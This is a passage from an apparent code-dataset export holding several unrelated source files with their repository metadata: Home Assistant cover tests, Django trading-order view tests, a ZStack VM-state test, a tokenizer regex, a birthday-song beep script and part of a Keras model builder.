cover.close_cover(self.hass, 'cover.test_template_cover')
self.hass.block_till_done()
cover.stop_cover(self.hass, 'cover.test_template_cover')
self.hass.block_till_done()
assert len(self.calls) == 2
def test_set_position(self):
"""Test the set_position command."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'input_number', {
'input_number': {
'test': {
'min': '0',
'max': '100',
'initial': '42',
}
}
})
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'position_template':
"{{ states.input_number.test.state | int }}",
'set_cover_position': {
'service': 'input_number.set_value',
'entity_id': 'input_number.test',
'data_template': {
'value': '{{ position }}'
},
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.set('input_number.test', 42)
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.state == STATE_OPEN
cover.open_cover(self.hass, 'cover.test_template_cover')
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_position') == 100.0
cover.close_cover(self.hass, 'cover.test_template_cover')
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_position') == 0.0
cover.set_cover_position(self.hass, 25,
'cover.test_template_cover')
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_position') == 25.0
def test_set_tilt_position(self):
"""Test the set_tilt_position command."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'position_template':
"{{ 100 }}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test_state'
},
'close_cover': {
'service': 'cover.close_cover',
'entity_id': 'cover.test_state'
},
'set_cover_tilt_position': {
'service': 'test.automation',
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
cover.set_cover_tilt_position(self.hass, 42,
'cover.test_template_cover')
self.hass.block_till_done()
assert len(self.calls) == 1
def test_open_tilt_action(self):
"""Test the open_cover_tilt command."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'position_template':
"{{ 100 }}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test_state'
},
'close_cover': {
'service': 'cover.close_cover',
'entity_id': 'cover.test_state'
},
'set_cover_tilt_position': {
'service': 'test.automation',
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
cover.open_cover_tilt(self.hass, 'cover.test_template_cover')
self.hass.block_till_done()
assert len(self.calls) == 1
def test_close_tilt_action(self):
"""Test the close_cover_tilt command."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'position_template':
"{{ 100 }}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test_state'
},
'close_cover': {
'service': 'cover.close_cover',
'entity_id': 'cover.test_state'
},
'set_cover_tilt_position': {
'service': 'test.automation',
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
cover.close_cover_tilt(self.hass, 'cover.test_template_cover')
self.hass.block_till_done()
assert len(self.calls) == 1
def test_set_position_optimistic(self):
"""Test optimistic position mode."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'set_cover_position': {
'service': 'test.automation',
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_position') is None
cover.set_cover_position(self.hass, 42,
'cover.test_template_cover')
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_position') == 42.0
cover.close_cover(self.hass, 'cover.test_template_cover')
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.state == STATE_CLOSED
cover.open_cover(self.hass, 'cover.test_template_cover')
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.state == STATE_OPEN
def test_set_tilt_position_optimistic(self):
"""Test the optimistic tilt_position mode."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'position_template':
"{{ 100 }}",
'set_cover_position': {
'service': 'test.automation',
},
'set_cover_tilt_position': {
'service': 'test.automation',
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_tilt_position') is None
cover.set_cover_tilt_position(self.hass, 42,
'cover.test_template_cover')
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_tilt_position') == 42.0
cover.close_cover_tilt(self.hass, 'cover.test_template_cover')
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_tilt_position') == 0.0
cover.open_cover_tilt(self.hass, 'cover.test_template_cover')
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_tilt_position') == 100.0
def test_icon_template(self):
"""Test icon template."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'value_template':
"{{ states.cover.test_state.state }}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test_state'
},
'close_cover': {
'service': 'cover.close_cover',
'entity_id': 'cover.test_state'
},
'icon_template':
"{% if states.cover.test_state.state %}"
"mdi:check"
"{% endif %}"
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('icon') == ''
state = self.hass.states.set('cover.test_state', STATE_OPEN)
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes['icon'] == 'mdi:check'
def test_entity_picture_template(self):
"""Test icon template."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'value_template':
"{{ states.cover.test_state.state }}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test_state'
},
'close_cover': {
'service': 'cover.close_cover',
'entity_id': 'cover.test_state'
},
'entity_picture_template':
"{% if states.cover.test_state.state %}"
"/local/cover.png"
"{% endif %}"
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('entity_picture') == ''
state = self.hass.states.set('cover.test_state', STATE_OPEN)
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes['entity_picture'] == '/local/cover.png'
| 38.216552
| 78
| 0.431768
| 2,269
| 27,707
| 5.009255
| 0.059057
| 0.09854
| 0.089741
| 0.064315
| 0.860197
| 0.843569
| 0.827028
| 0.819462
| 0.813919
| 0.813479
| 0
| 0.007147
| 0.459631
| 27,707
| 724
| 79
| 38.269337
| 0.752004
| 0.033674
| 0
| 0.703642
| 0
| 0
| 0.212209
| 0.059243
| 0
| 0
| 0
| 0
| 0.129139
| 1
| 0.036424
| false
| 0
| 0.011589
| 0
| 0.05298
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b7919cd97bca1692d94d13d58a2a1b9fc54dfab0
| 2,146
|
py
|
Python
|
trader/core/tests/test_view_orders.py
|
CryptTrader/CryptTrader
|
47a87923efd976281c154f898e1b01a8e449a9f8
|
[
"MIT"
] | null | null | null |
trader/core/tests/test_view_orders.py
|
CryptTrader/CryptTrader
|
47a87923efd976281c154f898e1b01a8e449a9f8
|
[
"MIT"
] | null | null | null |
trader/core/tests/test_view_orders.py
|
CryptTrader/CryptTrader
|
47a87923efd976281c154f898e1b01a8e449a9f8
|
[
"MIT"
] | null | null | null |
from django import test
from django.shortcuts import resolve_url as r
from trader.core.models import User, BillingAccount, BTCSellOrder, BTCBuyOrder
class BTCSellOrderViewTest(test.TestCase):
def setUp(self):
u = User.objects.create_user(username='user', email='a@user.com', password='pas$4W0rd')
self.ba = BillingAccount.objects.create(user=u)
self.client.login(username='user', password='pas$4W0rd')
self.resp = self.client.post(r('core:sell-order'), {'amount_brl': 2.5, 'amount_btc': 0.5})
def test_success(self):
"""POST /sell-order should redirect to index."""
self.assertRedirects(self.resp, r('core:index'))
def test_order_created(self):
"""Order should be created in database."""
self.assertTrue(BTCSellOrder.objects.exists())
class BTCBuyOrderViewTest(test.TestCase):
def setUp(self):
u = User.objects.create_user(username='user', email='a@user.com', password='pas$4W0rd')
self.ba = BillingAccount.objects.create(user=u)
self.client.login(username='user', password='pas$4W0rd')
self.resp = self.client.post(r('core:buy-order'), {'amount_brl': 2.5, 'amount_btc': 0.5})
def test_success(self):
"""POST /sell-order should redirect to index."""
self.assertRedirects(self.resp, r('core:index'))
def test_order_created(self):
"""Order should be created in database."""
self.assertTrue(BTCBuyOrder.objects.exists())
class BTCBuyOrderViewErrorTest(test.TestCase):
def setUp(self):
u = User.objects.create_user(username='user', email='a@user.com', password='pas$4W0rd')
self.ba = BillingAccount.objects.create(user=u)
self.client.login(username='user', password='pas$4W0rd')
self.resp = self.client.post(r('core:buy-order'), {'amount_brl': 2.5, 'amount_btc': ''})
def test_success(self):
"""POST /sell-order should redirect to index."""
self.assertRedirects(self.resp, r('core:index'))
def test_order_created(self):
"""Order should be created in database."""
self.assertFalse(BTCBuyOrder.objects.exists())
| 41.269231
| 98
| 0.670084
| 280
| 2,146
| 5.067857
| 0.217857
| 0.054968
| 0.071882
| 0.084567
| 0.794926
| 0.794926
| 0.794926
| 0.794926
| 0.794926
| 0.794926
| 0
| 0.012436
| 0.175676
| 2,146
| 52
| 99
| 41.269231
| 0.789712
| 0.11137
| 0
| 0.636364
| 0
| 0
| 0.128396
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 1
| 0.272727
| false
| 0.181818
| 0.090909
| 0
| 0.454545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
b79e6256ceab1bdbadea2081a013ceb41fff35a1
| 4,015
|
py
|
Python
|
integrationtest/vm/basic/test_MN_examine_vm_state.py
|
sherry546/zstack-woodpecker
|
54a37459f2d72ce6820974feaa6eb55772c3d2ce
|
[
"Apache-2.0"
] | 1
|
2021-03-21T12:41:11.000Z
|
2021-03-21T12:41:11.000Z
|
integrationtest/vm/basic/test_MN_examine_vm_state.py
|
sherry546/zstack-woodpecker
|
54a37459f2d72ce6820974feaa6eb55772c3d2ce
|
[
"Apache-2.0"
] | null | null | null |
integrationtest/vm/basic/test_MN_examine_vm_state.py
|
sherry546/zstack-woodpecker
|
54a37459f2d72ce6820974feaa6eb55772c3d2ce
|
[
"Apache-2.0"
] | 1
|
2017-05-19T06:40:40.000Z
|
2017-05-19T06:40:40.000Z
|
'''
Test MN monitor VM lifecycle START->RUNNING->STOPPED->RUNNING->PAUSED->RUNNING->PAUSED->STOPPED
@author:Mengying.li
'''
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import test_stub
import time
vm=None
def test():
global vm
vm=test_stub.create_vm()
vm.check()
vm_inv=vm.get_vm()
vm_uuid=vm_inv.uuid
vm_state = vm.get_vm().state
host_inv = test_lib.lib_find_host_by_vm(vm_inv)
host_ip= host_inv.managementIp
host_username=host_inv.username
host_password=host_inv.password
test_util.test_dsc('use virsh to stop vm in host')
cmd='virsh destroy %s'% (vm_uuid)
result=test_lib.lib_execute_ssh_cmd(host_ip, host_username, host_password, cmd, 180)
if result == False :
test_util.test_fail('Fail to execute cmd')
for i in range(0, 60):
vm.update()
if vm.get_vm().state == 'Stopped':
break
time.sleep(1)
if vm.get_vm().state != 'Stopped':
test_util.test_fail('VM is expected to in state stopped, while its %s' % (vm.get_vm().state))
test_util.test_dsc('use virsh to start vm in host')
cmd = 'virsh start %s' % vm_uuid
result=test_lib.lib_execute_ssh_cmd(host_ip, host_username, host_password, cmd,180)
if result == False:
test_util.test_fail('Fail to execute cmd')
for i in range(0, 60):
vm.update()
if vm.get_vm().state == 'Running':
break
time.sleep(1)
if vm.get_vm().state != 'Running':
test_util.test_fail('VM is expected to in state running, while its %s' % (vm.get_vm().state))
test_util.test_dsc('use virsh to suspend vm in host')
cmd = 'virsh suspend %s' % vm_uuid
result=test_lib.lib_execute_ssh_cmd(host_ip, host_username, host_password, cmd,180)
if result == False:
test_util.test_fail('Fail to execute cmd')
for i in range(0, 60):
vm.update()
test_util.test_logger('%s' % vm.get_vm().state)
if vm.get_vm().state == 'Paused':
break
time.sleep(1)
if vm.get_vm().state != 'Paused':
test_util.test_fail('VM is expected to in state suspended while its %s' % (vm.get_vm().state))
test_util.test_dsc('use virsh to resume vm in host')
cmd = 'virsh resume %s' % vm_uuid
result=test_lib.lib_execute_ssh_cmd(host_ip, host_username, host_password, cmd,180)
if result == False:
test_util.test_fail('Fail to execute cmd')
for i in range(0, 60):
vm.update()
if vm.get_vm().state == 'Running':
break
time.sleep(1)
test_util.test_dsc('use virsh to suspend vm in host')
if vm.get_vm().state != 'Running':
test_util.test_fail('VM is expected to in state running while its %s' % (vm.get_vm().state))
cmd = 'virsh suspend %s' % vm_uuid
result=test_lib.lib_execute_ssh_cmd(host_ip, host_username, host_password, cmd,180)
if result == False:
test_util.test_fail('Fail to execute cmd')
for i in range(0, 60):
vm.update()
test_util.test_logger('%s' % vm.get_vm().state)
if vm.get_vm().state == 'Paused':
break
time.sleep(1)
if vm.get_vm().state != 'Paused':
test_util.test_fail('VM is expected to in state suspended while its %s' % (vm.get_vm().state))
test_util.test_dsc('use virsh to stop vm in host')
cmd='virsh destroy %s'% (vm_uuid)
result=test_lib.lib_execute_ssh_cmd(host_ip, host_username, host_password, cmd, 180)
if result == False :
test_util.test_fail('Fail to execute cmd')
for i in range(0, 60):
vm.update()
if vm.get_vm().state == 'Stopped':
break
time.sleep(1)
if vm.get_vm().state != 'Stopped':
test_util.test_fail('VM is expected to in state stopped, while its %s' % (vm.get_vm().state))
vm.destroy()
vm.check()
test_util.test_pass('Test Success')
def error_cleanup():
global vm
if vm:
vm.destroy()
| 31.124031
| 102
| 0.637858
| 637
| 4,015
| 3.805338
| 0.11303
| 0.075908
| 0.063531
| 0.10396
| 0.793729
| 0.780528
| 0.780528
| 0.780528
| 0.780528
| 0.780528
| 0
| 0.013694
| 0.236115
| 4,015
| 128
| 103
| 31.367188
| 0.776655
| 0.028643
| 0
| 0.762887
| 0
| 0
| 0.197636
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020619
| false
| 0.082474
| 0.041237
| 0
| 0.061856
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
b7c6e6b363944a42f6e612f9e9b8e2afb53bf385
| 125
|
py
|
Python
|
__init__.py
|
xuwenyihust/Lunatic
|
d0be34065c716f166cfba992cfcbb9afeffc2167
|
[
"MIT"
] | 39
|
2017-09-25T10:54:50.000Z
|
2020-11-10T03:18:53.000Z
|
__init__.py
|
xuwenyihust/Lunatic
|
d0be34065c716f166cfba992cfcbb9afeffc2167
|
[
"MIT"
] | 56
|
2017-05-06T23:44:04.000Z
|
2020-02-16T08:14:15.000Z
|
__init__.py
|
xuwenyihust/Lunatic
|
d0be34065c716f166cfba992cfcbb9afeffc2167
|
[
"MIT"
] | 2
|
2017-10-03T11:24:14.000Z
|
2019-05-18T08:29:26.000Z
|
from .src import log_gen
from .src import apache_gen
def help():
return 'lunaticlog: to help you generate fake log loads.'
| 20.833333
| 58
| 0.76
| 21
| 125
| 4.428571
| 0.714286
| 0.150538
| 0.27957
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.168
| 125
| 5
| 59
| 25
| 0.894231
| 0
| 0
| 0
| 1
| 0
| 0.384
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
|
0
| 8
|
b7d2c0d1ebf7804ecf65d7081eeb22e80f9df7d3
| 197
|
py
|
Python
|
simplemma/tokenizer.py
|
adbar/simplemma
|
c4d0f3ff13f567d5c581f7408ead1df4753bb5b8
|
[
"BSD-2-Clause",
"CC-BY-4.0",
"MIT"
] | 22
|
2021-01-18T22:14:51.000Z
|
2022-03-18T04:32:29.000Z
|
simplemma/tokenizer.py
|
adbar/simplemma
|
c4d0f3ff13f567d5c581f7408ead1df4753bb5b8
|
[
"BSD-2-Clause",
"CC-BY-4.0",
"MIT"
] | 9
|
2021-01-18T17:50:44.000Z
|
2022-03-26T02:23:14.000Z
|
simplemma/tokenizer.py
|
adbar/simplemma
|
c4d0f3ff13f567d5c581f7408ead1df4753bb5b8
|
[
"BSD-2-Clause",
"CC-BY-4.0",
"MIT"
] | 1
|
2021-10-21T06:58:08.000Z
|
2021-10-21T06:58:08.000Z
|
"""Parts related to tokenization."""
import re
TOKREGEX = re.compile(r'(?:(?:[0-9][0-9.,:%-]*|St\.)[\w_€-]+|https?://[^ ]+|[@#§$]?\w[\w*_-]*|[,;:\.?!¿¡‽⸮…()\[\]–{}—/‒_“„”’′″‘’“”\'"«»=+−×÷•·]+)')
| 32.833333
| 147
| 0.350254
| 29
| 197
| 3.068966
| 0.827586
| 0.044944
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021622
| 0.060914
| 197
| 5
| 148
| 39.4
| 0.335135
| 0.152284
| 0
| 0
| 0
| 0.5
| 0.664596
| 0.658385
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
4d21fc6b113776a3fb393dc38d7799bced3c43cd
| 5,166
|
py
|
Python
|
hbd.py
|
SyahirahWanMin/HBD
|
32062c9dd5795c5911c7ed1d89fa5eb1103d7d92
|
[
"MIT"
] | null | null | null |
hbd.py
|
SyahirahWanMin/HBD
|
32062c9dd5795c5911c7ed1d89fa5eb1103d7d92
|
[
"MIT"
] | null | null | null |
hbd.py
|
SyahirahWanMin/HBD
|
32062c9dd5795c5911c7ed1d89fa5eb1103d7d92
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
import time
import sys
try:
import winsound
except ImportError:
import os
name = input("What is your name? ")
try:
winsound.Beep(264, 250)
sys.stdout.write('Ha')
time.sleep(500/2000.0)
sys.stdout.write('ppy ')
winsound.Beep(264, 250)
time.sleep(250/2000.0)
sys.stdout.write('birth')
winsound.Beep(297, 1000)
time.sleep(250/2000.0)
sys.stdout.write('day ')
winsound.Beep(264, 1000)
time.sleep(250/2000.0)
sys.stdout.write('to ')
winsound.Beep(352, 1000)
time.sleep(250/2000.0)
print('you')
winsound.Beep(330, 2000)
time.sleep(500/2000.0)
sys.stdout.write('Ha')
winsound.Beep(264, 250)
time.sleep(500/2000.0)
sys.stdout.write('ppy ')
winsound.Beep(264, 250)
time.sleep(250/2000.0)
sys.stdout.write('birth')
winsound.Beep(297, 1000)
time.sleep(250/2000.0)
sys.stdout.write('day ')
winsound.Beep(264, 1000)
time.sleep(250/2000.0)
sys.stdout.write('to ')
winsound.Beep(396, 1000)
time.sleep(250/2000.0)
print('you')
winsound.Beep(352, 2000)
time.sleep(500/2000.0)
sys.stdout.write('Ha')
winsound.Beep(264, 250)
time.sleep(250/2000.0)
sys.stdout.write('ppy ')
winsound.Beep(264, 500)
time.sleep(250/1000.0)
sys.stdout.write('birth')
winsound.Beep(440, 1000)
time.sleep(250/2000.0)
sys.stdout.write('day ')
winsound.Beep(352, 1000)
time.sleep(250/2000.0)
sys.stdout.write('dear ')
winsound.Beep(330, 1000)
print(name)
time.sleep(250/2000.0)
winsound.Beep(297, 1000)
winsound.Beep(440, 1000)
time.sleep(250/2000.0)
time.sleep(500/2000.0)
sys.stdout.write('Ha')
winsound.Beep(466, 250)
time.sleep(500/2000.0)
sys.stdout.write('ppy ')
winsound.Beep(466, 250)
time.sleep(250/2000.0)
sys.stdout.write('birth')
winsound.Beep(440, 1000)
time.sleep(250/2000.0)
sys.stdout.write('day ')
winsound.Beep(352, 1000)
time.sleep(250/2000.0)
sys.stdout.write('to ')
winsound.Beep(396, 1000)
time.sleep(250/2000.0)
print('you')
winsound.Beep(352, 2000)
time.sleep(250/2000.0)
except:
os.system('beep -f 264 -l 250')
sys.stdout.write('Ha')
sys.stdout.flush()
time.sleep(500/2000.0)
sys.stdout.write('ppy ')
sys.stdout.flush()
os.system('beep -f 264 -l 250')
time.sleep(250/2000.0)
sys.stdout.write('birth')
sys.stdout.flush()
os.system('beep -f 297 -l 1000')
time.sleep(250/2000.0)
sys.stdout.write('day ')
sys.stdout.flush()
os.system('beep -f 264 -l 1000')
time.sleep(250/2000.0)
sys.stdout.write('to ')
sys.stdout.flush()
os.system('beep -f 352 -l 1000')
time.sleep(250/2000.0)
print ('you')
os.system('beep -f 330 -l 2000')
time.sleep(500/2000.0)
sys.stdout.write('Ha')
sys.stdout.flush()
os.system('beep -f 264 -l 250')
time.sleep(500/2000.0)
sys.stdout.write('ppy ')
sys.stdout.flush()
os.system('beep -f 264 -l 250')
time.sleep(250/2000.0)
sys.stdout.write('birth')
sys.stdout.flush()
os.system('beep -f 297 -l 1000')
time.sleep(250/2000.0)
sys.stdout.write('day ')
sys.stdout.flush()
os.system('beep -f 264 -l 1000')
time.sleep(250/2000.0)
sys.stdout.write('to ')
sys.stdout.flush()
os.system('beep -f 396 -l 1000')
time.sleep(250/2000.0)
print ('you')
os.system('beep -f 352 -l 2000')
time.sleep(500/2000.0)
sys.stdout.write('Ha')
sys.stdout.flush()
os.system('beep -f 264 -l 250')
time.sleep(250/2000.0)
sys.stdout.write('ppy ')
sys.stdout.flush()
os.system('beep -f 264 -l 500')
time.sleep(250/1000.0)
sys.stdout.write('birth')
sys.stdout.flush()
os.system('beep -f 440 -l 1000')
time.sleep(250/2000.0)
sys.stdout.write('day ')
sys.stdout.flush()
os.system('beep -f 352 -l 1000')
time.sleep(250/2000.0)
sys.stdout.write('dear ')
sys.stdout.flush()
os.system('beep -f 330 -l 1000')
print (name)
time.sleep(250/2000.0)
os.system('beep -f 297 -l 1000')
os.system('beep -f 440 -l 1000')
time.sleep(250/2000.0)
time.sleep(500/2000.0)
sys.stdout.write('Ha')
sys.stdout.flush()
os.system('beep -f 466 -l 250')
time.sleep(500/2000.0)
sys.stdout.write('ppy ')
sys.stdout.flush()
os.system('beep -f 466 -l 250')
time.sleep(250/2000.0)
sys.stdout.write('birth')
sys.stdout.flush()
os.system('beep -f 440 -l 1000')
time.sleep(250/2000.0)
sys.stdout.write('day ')
sys.stdout.flush()
os.system('beep -f 352 -l 1000')
time.sleep(250/2000.0)
sys.stdout.write('to ')
sys.stdout.flush()
os.system('beep -f 396 -l 1000')
time.sleep(250/2000.0)
print ('you')
os.system('beep -f 352 -l 2000')
time.sleep(250/2000.0)
print ('HAPPY BIRTHDAY ' + name + ' <3 !!!')
print (" --------------------------------------------------------------------------------------------------------")
print (" | | | | /\ | __ \ | __ \ \ \ / / | _ \|_ _|| __ \|__ __|| | | || __ \ /\ \ \ / /")
print (" | |__| | / \ | |__) || |__) | \ \_/ / | |_) | | | | |__) | | | | |__| || | | | / \ \ \_/ / ")
print (" | __ | / /\ \ | ___/ | ___/ \ / | _ < | | | _ / | | | __ || | | | / /\ \ \ / ")
print (" | | | | / ____ \ | | | | | | | |_) |_| |_ | | \ \ | | | | | || |__| |/ ____ \ | | ")
print (" |_| |_|/_/ \_\|_| |_| |_| |____/|_____||_| \_\ |_| |_| |_||_____//_/ \_\|_| ")
| 25.448276
| 117
| 0.60511
| 796
| 5,166
| 3.817839
| 0.059045
| 0.17769
| 0.184271
| 0.187562
| 0.936821
| 0.920698
| 0.90951
| 0.877262
| 0.857519
| 0.84666
| 0
| 0.169707
| 0.161634
| 5,166
| 203
| 118
| 25.448276
| 0.531979
| 0
| 0
| 0.886486
| 0
| 0.027027
| 0.253726
| 0.020128
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.032432
| 0
| 0.032432
| 0.086486
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4d446b00a09696777e851be5c2f0060e65305da8
| 18,637
|
py
|
Python
|
gamestonk_terminal/prediction_techniques/neural_networks_view.py
|
DT021/GamestonkTerminal
|
10d231ec2f86a19e69fdb65a2f4d37f33f723f6a
|
[
"MIT"
] | 1
|
2021-07-25T20:34:29.000Z
|
2021-07-25T20:34:29.000Z
|
gamestonk_terminal/prediction_techniques/neural_networks_view.py
|
DT021/GamestonkTerminal
|
10d231ec2f86a19e69fdb65a2f4d37f33f723f6a
|
[
"MIT"
] | 1
|
2022-02-10T06:49:37.000Z
|
2022-02-10T06:49:37.000Z
|
gamestonk_terminal/prediction_techniques/neural_networks_view.py
|
DT021/GamestonkTerminal
|
10d231ec2f86a19e69fdb65a2f4d37f33f723f6a
|
[
"MIT"
] | null | null | null |
""" Neural Networks View"""
__docformat__ = "numpy"
from typing import List, Any
import traceback
import numpy as np
import pandas as pd
from tensorflow.keras.callbacks import EarlyStopping
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import (
LSTM,
SimpleRNN,
Dense,
Dropout,
Conv1D,
MaxPool1D,
AvgPool1D,
Flatten,
)
from tensorflow.keras.optimizers import (
Adam,
Adamax,
Adagrad,
Adadelta,
Ftrl,
Nadam,
RMSprop,
SGD,
)
from gamestonk_terminal.helper_funcs import get_next_stock_market_days
from gamestonk_terminal.prediction_techniques.pred_helper import (
prepare_scale_train_valid_test,
forecast,
plot_data_predictions,
parse_args,
restore_env,
print_pretty_prediction,
)
from gamestonk_terminal import config_neural_network_models as cfg_nn_models
optimizers = {
"Adam": Adam,
"Adagrad": Adagrad,
"Adadelta": Adadelta,
"Adamax": Adamax,
"Ftrl": Ftrl,
"Nadam": Nadam,
"Rmsprop": RMSprop,
"Ggd": SGD,
}
if cfg_nn_models.Early_Stop_Patience:
es = EarlyStopping(monitor="val_loss", patience=cfg_nn_models.Early_Stop_Patience)
else:
# Set patience to very long value
es = EarlyStopping(monitor="val_loss", patience=1000)
def build_neural_network_model(
Recurrent_Neural_Network: List[Any], n_inputs: int, n_days: int
) -> Sequential:
"""
Builds neural net from config_neural_network_models.py
Parameters
----------
Recurrent_Neural_Network: List[Any]
List of layers with parameters as a dictionary in the file
n_inputs: int
Number of days that will be fed into the NN
n_days: int
Number of days the NN wants to predict
Returns
-------
model: Sequential
Keras sequential model with layers from the file
"""
model = Sequential()
for idx_layer, d_layer in enumerate(Recurrent_Neural_Network):
# Recurrent Neural Network
if str(*d_layer) == "SimpleRNN":
# Is this the input layer? If so, define input_shape
if idx_layer == 0:
model.add(SimpleRNN(**d_layer["SimpleRNN"], input_shape=(n_inputs, 1)))
# Is this the last output layer? If so, set units to prediction days
elif idx_layer == (len(Recurrent_Neural_Network) - 1):
model.add(SimpleRNN(**d_layer["SimpleRNN"], units=n_days))
else:
model.add(SimpleRNN(**d_layer["SimpleRNN"]))
# Long-Short Term-Memory
elif str(*d_layer) == "LSTM":
# Is this the input layer? If so, define input_shape
if idx_layer == 0:
model.add(LSTM(**d_layer["LSTM"], input_shape=(n_inputs, 1)))
# Is this the last output layer? If so, set units to prediction days
elif idx_layer == (len(Recurrent_Neural_Network) - 1):
model.add(LSTM(**d_layer["LSTM"], units=n_days))
else:
model.add(LSTM(**d_layer["LSTM"]))
# Dense (Simple Neuron)
elif str(*d_layer) == "Dense":
# Is this the input layer? If so, define input_shape
if idx_layer == 0:
model.add(Dense(**d_layer["Dense"], input_dim=n_inputs))
# Is this the last output layer? If so, set units to prediction days
elif idx_layer == (len(Recurrent_Neural_Network) - 1):
model.add(Dense(**d_layer["Dense"], units=n_days))
else:
model.add(Dense(**d_layer["Dense"]))
# Conv1D Layer
elif str(*d_layer) == "Conv1D":
if idx_layer == 0:
model.add(Conv1D(**d_layer["Conv1D"], input_shape=(n_inputs, 1)))
else:
model.add(Conv1D(**d_layer["Conv1D"]))
# Max Pooling Layer for after Conv Layer
elif str(*d_layer) == "MaxPool1D":
model.add(MaxPool1D(**d_layer["MaxPool1D"]))
# Allow for if user wants to do average pooling
